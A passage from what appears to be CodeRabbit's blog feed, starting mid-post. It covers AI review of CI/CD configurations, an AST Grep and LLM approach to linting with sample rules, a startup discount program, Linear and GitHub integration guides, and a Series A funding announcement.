By recommending the addition of a caching step before the linting process, it helps reduce execution time for subsequent runs. This proactive feedback streamlines workflows without requiring manual intervention, ensuring a more efficient and optimized CI/CD pipeline. It also points out that the caching step in the build job is incorrectly structured. The `run` command (`npm install`) is placed in the same step as the cache action's `uses` entry, which could lead to improper execution. To resolve this, it suggests separating the caching and installation steps. The corrected version moves the cache logic into its own step and ensures the install command is executed independently in the next step, using `npm ci` for a cleaner, faster installation of dependencies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/66303693c8068f36c22669f46ca101fc7da2952cae771ac0099b6916fd6b3929_2a17413295.png) In the Terraform section of the configuration, it flags the hardcoded Terraform version as a potential issue and recommends using a variable instead. Additionally, the AWS credentials are defined only on the `apply` step, which would cause problems for the other Terraform commands such as `plan`. Lastly, it detects the typo `AWS_SECRET_ACCES_KEY` (it should be `AWS_SECRET_ACCESS_KEY`), as even minor mistakes can cause failures in your pipeline's execution. It suggests configuration changes that fix the typo, make the Terraform version easily updatable, and ensure AWS credentials are available for all Terraform commands. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/df9d17e49920896cf5374c5d4cd777b9c2dcedb1fcf40377417cee2fecf04f28_1344e8c2c9.png) In the docker job, it flags that the Docker image is built with the `latest` tag, which can be problematic for image versioning and rollbacks. It suggests configuration changes that apply both the `latest` tag and a specific version tag (e.g., git SHA) for better traceability and easier rollbacks. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/b43899f8043fa4d116ceccba98fcd50f4dc48b7e5b3ad971d9b64b0e65beddee_c9bf72256a.png) It also detected several potential issues in the deploy job that need attention. The manual approval step uses an auto-approve action, which defeats its purpose. Further, it finds a syntax error in the production deployment step, and the actual deployment scripts are missing, making the process incomplete. It suggests a fix for each of these issues. In this walkthrough, CodeRabbit’s AI-powered analysis quickly identified and highlighted the issues in the configuration file and suggested changes to resolve them. ## Benefits of Using CodeRabbit in CI/CD Pipelines By automating code reviews and providing precise feedback, CodeRabbit improves code quality and ensures that potential issues and vulnerabilities in your CI/CD pipeline are caught early, leading to smoother deployments and fewer errors. Let us look at some of the larger benefits of using CodeRabbit in CI/CD pipelines: ### Enhanced Developer Productivity By performing automated static checking workflows, CodeRabbit reduces the need for manual reviews and enables DevOps engineers to focus on strategic tasks like optimizing infrastructure and deployment processes rather than fixing configuration issues. Its instant feedback loop ensures issues are detected quickly and addressed after every commit, allowing you to maintain a rapid development pace. ### Improved Code Quality CodeRabbit enforces consistent configuration standards by automatically validating configuration files against best practices and catching configuration errors early. The platform learns from previous reviews, intelligently suppresses repetitive alerts, and allows you to focus on the most critical issues, making code reviews more efficient without compromising on thoroughness. CodeRabbit can also provide one-click suggestions that you can quickly integrate into your configuration files. 
### Security CodeRabbit helps DevOps engineers catch security vulnerabilities early, such as misconfigured access controls or insecure settings, reducing the chance of breaches. By integrating static checks into the CI/CD process, CodeRabbit prevents configuration errors from causing deployment failures, ensuring a more stable and reliable software delivery pipeline. ## Conclusion We saw in this post how misconfigurations can lead to delays, security vulnerabilities, or even broken deployments, making it essential to test them just as rigorously as application code. Unlike traditional approaches that overlook the criticality of testing configuration files, [CodeRabbit](https://coderabbit.ai) helps review CI/CD pipelines by automating code/config reviews, catching critical errors, and enhancing overall code quality. It significantly reduces manual review time, allowing DevOps teams to focus on strategic tasks and accelerate deployment cycles. Experience the impact of AI code review on your workflows – [start your free CodeRabbit trial today](https://coderabbit.ai/).

The AI-Native Universal Linter: Code Quality at Scale with AST Grep and LLMs

Aravind Putrevu — Tue, 15 Oct 2024 00:00:00 GMT

Smart teams embrace coding standards; smarter teams make them a habit. Coding standards often take a backseat to tight deadlines and pressure to ship features quickly. However, neglecting coding standards leads to a host of problems down the road, affecting code maintainability and increasing bug rates. Coding standards are a set of guidelines, best practices, and conventions that dictate how code is written and organized within a codebase. They cover aspects such as naming conventions, formatting, and architectural patterns. The primary goal of coding standards is to make the codebase more consistent, readable, and maintainable. Following coding standards can feel like navigating a maze blindfolded: it’s easy to get lost and frustrated. But what if you had a guide who could show you the path clearly? Enter [AST Grep](https://ast-grep.github.io/) + Generative AI, a powerful combination in the hands of developers to automate and simplify the process of maintaining code quality. In this blog, we will explore how you can leverage **Coding Standards as Code** using AST Grep + Generative AI, and streamline code quality for code written in any programming language. ## **Linters, the first line of defense** Linters are the unsung heroes of code quality (minus the noise!). These static code analysis tools have been the first line of defense against code quality issues for many decades. Static analysis tools scan the codebase, flagging potential problems and enforcing coding standards ranging from security impact to style and conventions. ### **Noisy nags or Helpful guides?** Linters have a reputation for being noisy, flagging every minor issue and style inconsistency with a relentless fervor. Developers often find themselves in a love-hate relationship with these tools, appreciating the responses from these scanners, while simultaneously cursing the endless stream of warnings and errors. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/b5c7959897f61edfdfa25a273716827cce593480025f0bd97e7c6ac4b555cb46_409097ebde.png)

Beneath the noise, linters act as a constant reminder to write clean, consistent, and maintainable code. They nudge developers towards best practices and help prevent the accumulation of tech debt.

### **Some popular linters to keep in your toolbelt**

Here are a few examples of powerful linters across different programming languages.

* [Biome.js](https://biomejs.dev/): A code quality tool for JavaScript/TypeScript projects. Biome offers a unified interface for running lint rules, formatters, and static analyzers, which simplifies the setup and configuration of a code quality tool. To customize Biome, you need a `biome.json` or `biome.jsonc` file.
* [Ruff](https://docs.astral.sh/ruff/): A fast and user-friendly linter for Python. Ruff ships with a built-in formatter and linter, and includes rules from other Python-specific linters. It covers more than 800 lint rules and replaces [50+ Python code quality](https://docs.astral.sh/ruff/rules/) related packages. Ruff is configured through `pyproject.toml` or `.ruff.toml`.
* [PHPStan](https://phpstan.org): PHPStan performs static code analysis, finds potential bugs, and promotes best practices. PHPStan can be configured with `phpstan.neon` or `phpstan.neon.dist`.

Notice that each linter has to be configured individually, and each brings its own complexity, rules that may be inconsistent or in conflict with your organization's coding policies, varying granularity, and a maintenance burden.

## **Linters and Generative AI**

We are in the era of generating images, text, audio, and even code. Code is sacrosanct for developers, and yet it can now be generated at the press of a button. Powerful Large Language Models (LLMs) with strong reasoning capabilities help generate contextual code that matches the need.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/b15644cdd99a19c63025c938e746b8a0da5248a825ba91920e7b77a89d0de52c_a9dabb5567.gif)

These LLMs can generate not just code but also tooling specs such as YAML files, Dockerfiles, and lint configurations. With the adoption of AI coding assistants, developers are writing more features than ever. While impressive, the generated code may still contain bugs or not fully align with the specific requirements and coding standards of the organization. Similarly, generated linter configurations might not be as effective as rules tailored to your organization's guidelines.

The role of linters and code review remains crucial. Interestingly, this is a good problem to solve on both sides, again using Generative AI.

## AST Grep: A Smarter Approach to Code Quality

[AST Grep](https://ast-grep.github.io/) is a powerful tool that allows you to write custom rules using a simple regex-like query language to match code patterns.

Let us take a look at some sample Python code and how AST Grep can detect patterns.

```python
def authenticate(username, password):
    if username == "admin" and password == "supersecret":
        return True
    return False
```

### AST Grep Pattern

```yaml
# secret_detector.yml
id: detect-hardcoded-credentials
language: python
rule:
  pattern: |-
    def $FUNC_NAME($USERNAME, $PASSWORD):
        if $USERNAME == "$USER_VALUE" and $PASSWORD == "$PASS_VALUE":
            return True
        return False
message: "Hardcoded credentials detected in authentication function"
severity: warning
```

### Run AST Grep

```shell
sg scan --rule secret_detector.yml /path/to/your/python/files
```

```text
sample_code.py: Hardcoded credentials detected in authentication function
    if username == "admin" and password == "supersecret":
       ^^^^^^^^^^^^^^^^^^^^^^^^
```

> Note: You can run this rule live in the [AST Grep playground](https://ast-grep.github.io/playground.html).
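To make the idea of matching on syntax rather than on raw text more concrete, here is a minimal sketch that performs a similar check with Python's standard `ast` module instead of AST Grep. The function name `find_hardcoded_comparisons` and the heuristic it uses (any `==` comparison between a variable and a string literal) are assumptions made for illustration; they are not part of AST Grep or of the rule above.

```python
import ast

SAMPLE = '''
def authenticate(username, password):
    if username == "admin" and password == "supersecret":
        return True
    return False
'''


def find_hardcoded_comparisons(source: str) -> list[tuple[int, str, str]]:
    """Return (line, variable, literal) for each `name == "literal"` comparison."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Only consider simple comparisons with a single `==` operator.
        if not isinstance(node, ast.Compare):
            continue
        if len(node.ops) != 1 or not isinstance(node.ops[0], ast.Eq):
            continue
        left, right = node.left, node.comparators[0]
        # Hypothetical heuristic: a variable compared against a string literal.
        if (
            isinstance(left, ast.Name)
            and isinstance(right, ast.Constant)
            and isinstance(right.value, str)
        ):
            findings.append((node.lineno, left.id, right.value))
    return findings


if __name__ == "__main__":
    for line, variable, literal in find_hardcoded_comparisons(SAMPLE):
        print(f"line {line}: {variable} compared against hardcoded string {literal!r}")
```

Because the check walks the syntax tree, it is unaffected by whitespace or line wrapping, which is the same property that makes AST-based rules more robust than plain text search.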
You can write more complex [AST Grep patterns](https://github.com/coderabbitai/ast-grep-essentials) to enforce coding standards and best practices specific to your repository or organization.

### **Discovering Code Intent with AST Grep**

Beyond enforcing coding standards, AST Grep can be used to gain deeper insight into the logic and reasoning behind code flow. In most organizations, stakeholders make critical business decisions, often in response to past incidents, that end up encoded in the code. By crafting targeted patterns, you can codify architectural decisions or surface potential performance bottlenecks.

For example, let’s say you want to detect whether a function is making a network call.

```yaml
id: detect-requests-get
language: Python
rule:
  # Match any call of the form <module>.<function>(...), then narrow it down with constraints
  pattern: $MODULE.$FUNCTION($$$ARGS)
constraints:
  MODULE:
    regex: ^requests$
  FUNCTION:
    regex: ^get$
message: "HTTP GET request detected. Ensure proper error handling and consider security implications."
severity: warning
```

The rule looks for function calls where the `requests` module is used to make a `GET` request, indicating a network call. This lets you identify network calls across your codebase even if the code is complex or poorly documented.

Similarly, you can create [AST Grep Rules](https://ast-grep.github.io/guide/rule-config.html) to detect:

* Usage of specific libraries or frameworks
* Error handling patterns
* Resource management (ex: opening and closing files)
* Concurrency patterns (ex: usage of threads or async/await)

By understanding the intent behind code snippets, you can make more informed decisions about refactoring, optimization, or architectural changes.

## **Coding Standards as Code with AST Grep and Generative AI**

Now that we’ve seen how AST Grep can be used to discover the intent behind code, let’s take it a step further and explore how we can combine it with Generative AI to yield better results than lint rules alone.
In a typical Retrieval Augmented Generation (RAG) setup, you supplement the LLM with information retrieved from your own data, and the LLM generates its response using that context. The retrieved context (vectorized data) grounds the LLM in factual information, reducing possible hallucinations. This matters because the probability of an LLM producing false or inconsistent information increases with the complexity of the problem.

By combining AST Grep with RAG, we can provide the LLM with highly relevant and focused context about the code being analyzed. AST Grep can extract specific code patterns, architectural decisions, and potential issues, which can then be fed into the LLM as additional context. This also makes it possible to suggest 1-click fixes for the problems found. Now, without writing a single lint rule, you can understand (reason about), find, and suggest fixes for even the most complex code problems.

Let's say we use the AST Grep rule below to identify all instances of database queries in a codebase:

```yaml
id: parameterised-db-query
language: python
rule:
  pattern: $RESULTS = $DB.query($QUERY, $PARAM)
message: "Consider using parameterized queries for better security"
severity: warning
fix: |-
  $RESULTS = $DB.execute($QUERY, ($PARAM,))
```

AST Grep would find code snippets like:

```python
results = db.query("SELECT * FROM users WHERE id = ?", user_id)
```

These snippets, along with their surrounding context, can be passed to the LLM as part of the RAG process. The LLM can then analyze the code, understand its intent, and generate suggestions or identify potential issues based on best practices and coding standards.

In this case, the LLM might suggest using an ORM library like SQLAlchemy to make the code more maintainable and less prone to SQL injection attacks.

```python
user = User.query.filter_by(id=user_id).first()
```

This approach has several advantages over traditional linter rules: it reduces noise and allows feedback to be more nuanced and intelligent.
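As a rough illustration of the flow described above, the sketch below finds `db.query(...)`-style calls with Python's standard `ast` module (standing in for AST Grep), gathers a few surrounding lines as context, and assembles a prompt. The helper names `find_query_calls` and `build_review_prompt`, the context window size, and the prompt wording are all hypothetical. Sending the prompt to a model is left out because it depends on the LLM client in use.

```python
import ast

SOURCE = '''\
def load_user(db, user_id):
    results = db.query("SELECT * FROM users WHERE id = ?", user_id)
    return results
'''


def find_query_calls(source: str) -> list[int]:
    """Return line numbers of calls shaped like `<something>.query(...)`."""
    lines = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == "query"
        ):
            lines.append(node.lineno)
    return sorted(lines)


def build_review_prompt(source: str, line_numbers: list[int], window: int = 1) -> str:
    """Assemble a prompt containing each match plus `window` lines of context."""
    source_lines = source.splitlines()
    sections = []
    for lineno in line_numbers:
        # Line numbers are 1-based; clamp the context window to the file bounds.
        start = max(lineno - 1 - window, 0)
        end = min(lineno + window, len(source_lines))
        snippet = "\n".join(source_lines[start:end])
        sections.append(f"Match at line {lineno}:\n{snippet}")
    header = "Review these database calls against our coding standards:"
    return header + "\n\n" + "\n\n".join(sections)


if __name__ == "__main__":
    matches = find_query_calls(SOURCE)
    print(build_review_prompt(SOURCE, matches))
```

The point of the sketch is the division of labor: the deterministic matcher decides which code the model sees, and the model is only asked to reason about that focused context.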
LLMs can also explain the rationale behind their suggestions.

### Deterministic Code Quality at Scale with CodeRabbit

At CodeRabbit, we believe that the combination of RAG and AST Grep creates a powerful approach to enforcing coding standards. One of the key challenges with Generative AI models is their tendency to produce output that, while coherent and contextually relevant, may not always align with the specific requirements of a given codebase.

This is where deterministic grounding comes into play.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/47ea48efe84582e33dca0671d2ed92624222c5458d1c2d4eb5f2fff10036d337_aa449aede2.png)

By leveraging AST Grep to extract not just code patterns but also concrete, deterministic information about code (ex: variable names, function signatures, dependencies), we can provide LLMs with a more realistic context. This helps suppress the noise and variability in the suggestions.

This additional context guides the LLMs to generate suggestions that are not only conceptually relevant but also syntactically and semantically valid within the project's existing setup.

For instance, going back to the database query example, the LLM-generated suggestion to use an ORM library is contextually relevant. The developer can review the suggestion and apply it with a single click, without needing to rewrite the code by hand.

## AST Grep + RAG: The AI-native Universal Linter

At this point, you might be thinking: "This all sounds great, but how can I actually start using these techniques in my own projects?"

Enter [CodeRabbit](https://coderabbit.ai/), an AI code reviewer that works with existing code hosting platforms like GitHub, GitLab, and Azure DevOps.

At CodeRabbit, we’ve taken this concept and turned it into a powerful tool that improves developer productivity alongside code quality. Our AI-native code reviewer harnesses the potential of LLMs and AST Grep.
CodeRabbit also maintains unique and custom AST Grep rules for the developer community in the [ast-grep-essentials](https://github.com/coderabbitai/ast-grep-essentials) GitHub repository. Do consider giving us a star.

Sign up for [CodeRabbit](https://coderabbit.ai) and get started on your AI code quality journey.

Announcing CodeRabbit Startup Program

Aravind Putrevu — Mon, 30 Sep 2024 00:00:00 GMT

In the startup world, speed and quality are often seen as tradeoffs; with AI-powered code reviews, you can have both. Startups and small dev teams face numerous challenges shipping code day-to-day while navigating tight deadlines and meeting user expectations with limited resources. Each phase can be a leap to the next level of growth and a better chance of standing out.

At CodeRabbit, we understand the importance of shipping better-quality code. Being a startup ourselves, we know how much it matters to ship bug-free code that enables better customer experiences.

We are thrilled to announce our new Startup Program, designed to bring the power of AI-powered code reviews to emerging tech companies.

## CodeRabbit Startup Program

Our startup program is designed to give early-stage companies access to AI-powered code review technology. We understand that when you are building something new, every resource counts. CodeRabbit helps you maximize your development team's potential.

Our system enhances **code quality** through intelligent PR reviews, helping your codebase remain robust and maintainable. We've also integrated advanced **code security** measures that help safeguard your applications against vulnerabilities. Our AI **copilot for pull requests** streamlines the review process, catching issues early and facilitating smoother collaboration. All of these features work in concert to boost overall **developer productivity**, allowing your team to focus on what truly matters: building and shipping great products.

### What's included in the Startup Program?

* 50% off for 6 months on a CodeRabbit **Pro Plus annual plan** after the standard 14-day free trial period.
* Support
* Access to the CodeRabbit community on Discord

[Discover the features and benefits of the Pro Plus Plan](https://www.coderabbit.ai/pricing)

### Eligibility Criteria

* VC or accelerator-backed startups that do not yet have a CodeRabbit account
* Funding of less than $25 million

## Benefits of using AI-powered Code Reviews

CodeRabbit is your invisible Senior Engineer, reviewing every code change in real time. We can help you by:

* Accelerating your development cycles.
* Improving code quality and security coverage, PR by PR.
* Retaining best-practice learnings from human reviewers at an organization level.
* Improving developer and reviewer productivity by cutting bugs and review time in half.

## Getting Started with the Startup Program

* Fill out the [Startup Program application form](https://coderabbit.ai/startup-program).
* Our team will review your application within 2 business days.
* You will receive an email with details once your application is approved.

At CodeRabbit, we believe that AI is not here to replace developers but to improve their productivity and empower them. By handling the repetitive aspects of code review, [CodeRabbit](https://coderabbit.ai/) frees up your team to focus on what they do best: creating the best business outcomes!

We are excited to partner with the next generation of tech companies and help them build robust, scalable solutions that will shape our future in many ways.

Join our [startup program today](https://coderabbit.ai/startup-program) and experience AI-driven code reviews.

How to use CodeRabbit to validate issues against Linear Board

Aravind Putrevu — Wed, 04 Sep 2024 00:00:00 GMT

CodeRabbit is an AI code review tool that integrates with version control platforms like GitHub, GitLab, and Azure DevOps. It automatically analyzes pull requests, providing comprehensive reviews powered by Large Language Models (LLMs). CodeRabbit offers detailed feedback, flags potential issues, and suggests code improvements. Teams can customize CodeRabbit's behavior through an intuitive UI or YAML configuration files, allowing it to adapt to specific project requirements and coding standards.

But did you know that CodeRabbit can also connect with your issue tracking or project management tools, such as Linear and Jira, to validate issues as part of a context-aware pull request review?

This blog post covers the CodeRabbit feature that analyzes the issues linked to pull requests and checks whether the code changes effectively resolve them. Whether you're using GitHub, Jira, or Linear for issue tracking, CodeRabbit integrates with all three.

Before we explore the Linear integration, if you're new to CodeRabbit, we suggest checking [this blog](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline). It explains how CodeRabbit performs code reviews for pull requests. This background will help you better understand the context of the Linear integration.

### Setting up Linear Integration

Head over to the Integrations section in [CodeRabbit](https://app.coderabbit.ai/) and flip the Linear button ON. You've now started the integration process.

![](https://framerusercontent.com/images/xdLp3Mfmk7yFvqshH6p0kFYuLo.png)

Once you've enabled the integration, you'll need to authorize CodeRabbit to access your Linear workspace. The process differs slightly depending on whether you're a new or existing Linear user. If you're already using Linear, simply authorize it for your workspace. New to Linear? Just follow the setup prompts to get everything configured.
![](https://framerusercontent.com/images/D5SHy7RDyI4zv67wd4uemh3w1oQ.png)

With these two straightforward steps, you've successfully integrated CodeRabbit with Linear. This connection allows CodeRabbit to access your **entire** Linear workspace and provide context-aware code reviews for your pull requests.

If you need to limit CodeRabbit's access to specific Linear projects, you can do so in three ways.

#### Organization Settings

Navigate to the *Organization Settings* -> *Configuration* -> *Knowledge Base* -> *Linear Team Keys* section and enter the project keys of the Linear projects you want CodeRabbit to access. By doing this, you ensure that CodeRabbit only uses issue context from the projects you've specified, keeping other project data off-limits.

![](https://framerusercontent.com/images/sd6TDexbbrQ2QU72yEYRhP9w.png)

#### Repository Settings

Navigate to the *Repository Settings* -> *Knowledge Base* -> *Linear Team Keys* section and enter the project keys of the Linear projects you want CodeRabbit to access.

#### YAML Configuration

If you're using YAML configuration (`.coderabbit.yaml`), you can also specify Linear team keys in the section shown below:

> linear:
>
> team\_keys:

> Note:
>
> 1. Settings are applied in order of precedence: YAML > Repository > Organization.
> 2. We're assuming you've already connected GitHub and Linear, allowing you to manage GitHub issues through Linear.

On that note, if you haven't set up your GitHub and Linear integration yet, just head over to your Linear workspace settings. Click on 'Integrations', then 'GitHub'. From there, you'll see options to connect your GitHub account, link your organization, and select which repositories you want to sync with Linear.

Once the repository sync is set up, your issues will sync between GitHub and Linear automatically. Create an issue in either place, and it'll show up in both.
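The precedence in the note above (YAML over repository settings over organization settings) can be pictured with a small sketch. The function `effective_team_keys`, the example keys, and the choice to treat an empty list as "not configured" are all hypothetical and only illustrate the ordering; this is not CodeRabbit's implementation.

```python
from typing import Optional, Sequence


def effective_team_keys(
    yaml_keys: Optional[Sequence[str]],
    repository_keys: Optional[Sequence[str]],
    organization_keys: Optional[Sequence[str]],
) -> list[str]:
    """Pick the first configured source in the order YAML > Repository > Organization."""
    for keys in (yaml_keys, repository_keys, organization_keys):
        if keys:  # assumption: None and empty lists both mean "not configured"
            return list(keys)
    return []  # nothing configured at any level


if __name__ == "__main__":
    # No YAML keys, so the repository-level setting wins over the organization one.
    print(effective_team_keys(None, ["ENG"], ["ENG", "OPS"]))
```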
### Context-aware PR Review using CodeRabbit’s Issue Validation

CodeRabbit starts by identifying the issue linked to the pull request. It then analyzes the code changes in detail and evaluates whether they effectively address the linked issue, checking that the intended problem is actually solved.

The image below demonstrates how CodeRabbit presents its analysis, showing whether the pull request successfully addresses the linked issue. This assessment helps developers and reviewers quickly understand whether the code changes align with the issue's requirements.

In the PR below, CodeRabbit's analysis begins by identifying the linked issue `#9220`, which aims to remove legacy `README.md` handling in programming exercises. It then examines the pull request's code changes across multiple files, focusing on modifications that treat `README.md` like any other file in the online code editor. CodeRabbit concludes that the pull request effectively addresses the linked issue, as indicated by the green checkmark in the "Assessment against linked issues" section. This demonstrates CodeRabbit's ability to validate whether code changes truly resolve the intended issue, in this case updating the handling of `README.md` files in the programming exercise system.

![](https://framerusercontent.com/images/ClgZcp0w2ghA1nVMeBnUrP0n9I.png)

You can also interact with CodeRabbit through chat to verify whether a pull request fully addresses its linked issue, helping you make informed decisions about merging.

![](https://framerusercontent.com/images/3tvR9vW1rEmsaYI1LMvP28D5opI.png)

We hope this guide has clarified how to integrate CodeRabbit with Linear and how CodeRabbit uses issue context to validate pull requests. With this integration, you can verify whether pull requests effectively solve the problems they're meant to address.

Integrate CodeRabbit and let it take care of your PR reviews and issue validation. [Start your free trial](https://app.coderabbit.ai/login) today!

How to integrate AI Code Review into your DevOps pipeline

Aravind Putrevu — Sun, 25 Aug 2024 00:00:00 GMT

GitHub is the central hub for countless open-source projects. However, for repository maintainers, a steady flow of pull requests (PRs) can quickly turn into an [overwhelming workload](https://minimaxir.com/2023/11/open-source-dead-github/). Those managing popular OSS repositories with numerous stars are well aware of the challenges of keeping up with code reviews, maintaining quality, and keeping the project on track.

A quick search for “has this been abandoned” on GitHub says a lot about what’s happening across various successful repositories.

![](https://framerusercontent.com/images/0ehCtGtnWx4lSZORxdaHXWQF0Q.png)

A healthy Maintainer <> Contributor equation has a lot of pieces, but pull requests play a substantial role, as they are the biggest point of contact with the repo maintainers after finding an issue one could work on.

We at CodeRabbit have lived through this problem, and with the advent of Generative AI and code generation models, we realised we could help improve this part of a developer’s life.

[CodeRabbit](https://coderabbit.ai/) is an AI code reviewer designed to ease the challenges of code review, supporting repository maintainers and teams. It not only reviews your PRs but also provides concise summaries, identifies potential issues, and offers insights that might be missed during manual reviews.

## How CodeRabbit Works

Curious about how CodeRabbit works? Here's a breakdown of the process:

CodeRabbit integrates with GitHub, automating the code review process from the moment a pull request is created. It preprocesses the PR content, builds context, leverages Large Language Models for analysis, and then post-processes the AI response before posting the review back to GitHub. This streamlined workflow delivers thorough AI-powered code reviews without manual intervention.

![](https://framerusercontent.com/images/uKEWrFEa2GbnjvC09Vwm2tMskB4.png)

## Integrating with GitHub

### 1\. Accessing CodeRabbit

Navigate to the [CodeRabbit login](https://coderabbit.ai/) page. You'll be presented with various Git platform options when you try to log in. Choose the one you use: GitHub, GitLab, self-hosted GitHub, or self-hosted GitLab.

![](https://framerusercontent.com/images/1ytWwnELwfYl5nVtfsv9fcr7IQ.png)

After selecting your Git platform, follow the specific configuration guide:

1. GitHub: Standard login (steps provided below)
2. GitLab: Follow the standard login and authorization steps below. For organization-wide use, consider creating a dedicated GitLab user with a [Personal Access Token](https://docs.coderabbit.ai/platforms/saas-gitlab).
3. Self-Hosted GitHub: [Setup instructions](https://docs.coderabbit.ai/platforms/self-hosted-github)
4. Self-Hosted GitLab: [Setup instructions](https://docs.coderabbit.ai/platforms/self-hosted-gitlab)

### 2\. Authorization

If you chose Login with GitHub or GitLab in step 1, you'll be prompted to authorize CodeRabbit. This step grants the necessary permissions for CodeRabbit to interact with your repositories and pull requests.

![](https://framerusercontent.com/images/nzbULb8XfAN3on8yqTEQeT5PEzI.png)

### 3\. Selecting Your Organization

After authorization, if you're part of multiple organizations, you'll have the opportunity to choose which one you want to associate with CodeRabbit. This ensures that you're setting up the tool for the correct team or project.

![](https://framerusercontent.com/images/N2VObQnTCwyi7UMHwBsMvgbr0e8.png)

### 4\. Exploring the CodeRabbit Dashboard

Upon successful authorization, you'll be logged into the CodeRabbit user interface. Here, you can add repositories and configure CodeRabbit settings for each repository.

Here’s how the UI looks:

![](https://framerusercontent.com/images/lw0O1J8R5dpL0AKWurfAAJ110.png)

💡 If you opt to authorize all repositories during setup, CodeRabbit will automatically include any new repositories you create on GitHub in the future.
This saves you the hassle of manual additions down the line.

### 5\. CodeRabbit Configuration

With your repositories added, it's time to configure CodeRabbit to your needs. You can configure CodeRabbit through a YAML file or using the [App’s UI](http://app.coderabbit.ai/).

You can tailor CodeRabbit's functionality using the `.coderabbit.yaml` file, which you place directly in your GitHub repository. This file mirrors the options available in the CodeRabbit user interface, with each setting in the YAML corresponding to a specific toggle in the UI.

💡 If a `.coderabbit.yaml` file exists in your GitHub repository, it takes precedence over any UI settings. Choose either the YAML file or UI configuration; you don't need to use both.

Refer to the `.coderabbit.yaml` schema [here](https://storage.googleapis.com/coderabbit_public_assets/schema.v2.json).

Once your `.coderabbit.yaml` file is prepared according to your needs, simply place it in your GitHub repository, and you’re all set. CodeRabbit is now integrated!

When a pull request is created targeting the master branch, CodeRabbit automatically initiates its review process. It analyzes the changes and generates a summary and walkthrough of the modifications.

The specific feedback and analysis provided by CodeRabbit are determined by the options you've configured in your YAML file.

Let's examine a few examples of CodeRabbit's review comments from a specific pull request in one of the projects. This particular PR changed the language model from LLaMA 2 to LLaMA 3 for testing purposes.
These examples showcase how CodeRabbit analyzed and commented on this significant model switch.

## Sample PR Review Workflow using CodeRabbit

For every PR reviewed, CodeRabbit starts with a summary of changes, as in the image below.

![](https://framerusercontent.com/images/W5pT98lxSt0FkgiOTGJGwffYJU.png)

This image shows CodeRabbit's review status for another pull request. It highlights that 12 actionable comments were generated, and the review also includes additional comments on specific files, demonstrating CodeRabbit's comprehensive analysis of the code changes.

![](https://framerusercontent.com/images/ELCA1tXozaqouACK7O5gmupX8M.png)

You can also use [CodeRabbit commands](https://docs.coderabbit.ai/guides/commands) to chat with the AI code reviewer.

![](https://framerusercontent.com/images/WETVItDWHiveH27B5zMpbGeVXg.png)

CodeRabbit can generate a sequence diagram when you request a full review. The sequence diagram illustrates the flow of interactions between the objects in the system.

![](https://framerusercontent.com/images/4OsUVqlm5wAKXcYjU7uoIHvfw.png)

Also check out the response when I asked what improvements could be made at the code level.

![](https://framerusercontent.com/images/cU2uOXf789BZX16lsNkDPfLXkA4.png)

In addition to providing reviews and summaries, CodeRabbit can also detect configuration issues. For example, I accidentally set up both CodeRabbit Pro (the process we've been discussing) and the open-source version (refer to its [different config process](https://github.com/coderabbitai/ai-pr-reviewer?tab=readme-ov-file#install-instructions)) in my repository at the same time. Interestingly, CodeRabbit noticed this mistake on its own and alerted me. You can see below how it pointed out the issue.

![](https://framerusercontent.com/images/D9jXYWaO630Igu5sCAxD5jHjg.png)

Check out some of the stats and test plans generated by this AI code reviewer for a pull request in a different project.
![](https://framerusercontent.com/images/b6G6wz1xcrseIFuZOE7Q0SVrHw.png)

![](https://framerusercontent.com/images/0hC400ltZ5c9ML3abQw4kEQE3E.png)

CodeRabbit also allows you to configure custom review instructions based on your organization's needs, in case you want it to follow specific guidelines beyond the standard review. To learn more, see [adding custom review instructions](https://docs.coderabbit.ai/guides/review-instructions/).

Whether you manage a popular repository or work on a smaller project, and whether it's hosted on GitLab, GitHub, or a self-hosted GitHub or GitLab instance, CodeRabbit can help streamline your development process. This AI code review assistant is designed to save you time by automating code reviews and offering insightful feedback.

Explore! Experiment! Discover how [CodeRabbit](https://docs.coderabbit.ai/) can streamline your code review process using AI!

CodeRabbit Announces $16M Series-A Funding Led by CRV

Aravind Putrevu — Tue, 13 Aug 2024 00:00:00 GMT

Exciting news! CodeRabbit has secured a [$16 million Series A funding round](https://www.crv.com/companies/coderabbit), with [CRV](https://www.crv.com/) leading the charge. This funding will help us accelerate our mission to transform code quality, security, and developer productivity with AI. [Reid Christian](https://www.crv.com/team/reid-christian), General Partner at CRV, will be joining our board, and we're thrilled to leverage CRV's expertise and network to serve our customers better.

For us, finding the right early-stage VC firm was all about increasing our productivity and accelerating our growth. Selecting CRV as our partner was easy given the firm's commitment to the developer community and its track record of working alongside founders, not just in the startup phase, but through IPO and beyond.

This round includes investments from [Tod Sacerdoti (Flex Capital)](https://www.flexcapital.com/), [Ashmeet Sidana (Engineering Capital)](https://www.engineeringcapital.com/), and several mentors, who bring a wealth of experience in developer tools and enterprise AI.

## Our Journey So Far

We are witnessing an inflection point in the software development industry. Developers around the world have been realizing the incredible possibilities that AI can bring. The introduction of GitHub Copilot and ChatGPT has revolutionized software development, and they have been the fastest-growing tools in this space.

While many tools have emerged on the code generation side, the code review process has remained largely unchanged. We continue to use the same tools and processes that were used 10 years ago. Code is still reviewed manually, which is slow, error-prone, and expensive.

CodeRabbit was born out of this realization. As developers ourselves, we faced the inefficiencies and frustrations of traditional code reviews at our previous workplaces.
We envisioned an AI-powered code reviewer that could save developers countless hours while improving code quality beyond what is possible with human reviewers and existing linting tools alone.

Since its inception, CodeRabbit has been well received by the developer community. The company reached the $1M+ annual recurring revenue milestone in less than a year, while operating on a bootstrapped budget.

Some high-level traction stats:

* Most installed AI application on GitHub Marketplace: 16K+ installations
* 150K+ repositories under review
* Several hundred paying organizations
* High adoption in open-source projects: 300K+ pull requests reviewed
* On average, 10K+ developers use CodeRabbit daily
* Strong community: 15K+ followers on X and 2K+ users on our Discord server

## What Worked for Us

* **Intuitive product experience**: Investing in sheer delight and attention to detail helped build a loyal user base. This is especially true in the AI-applications space, where user experience can make or break a product. Most AI products tend to be spammy and noisy, leading to user abandonment. Right from the get-go, we strived to maintain a high signal-to-noise ratio in our product and provide feedback that is actionable and easy to accept without cognitive overload.
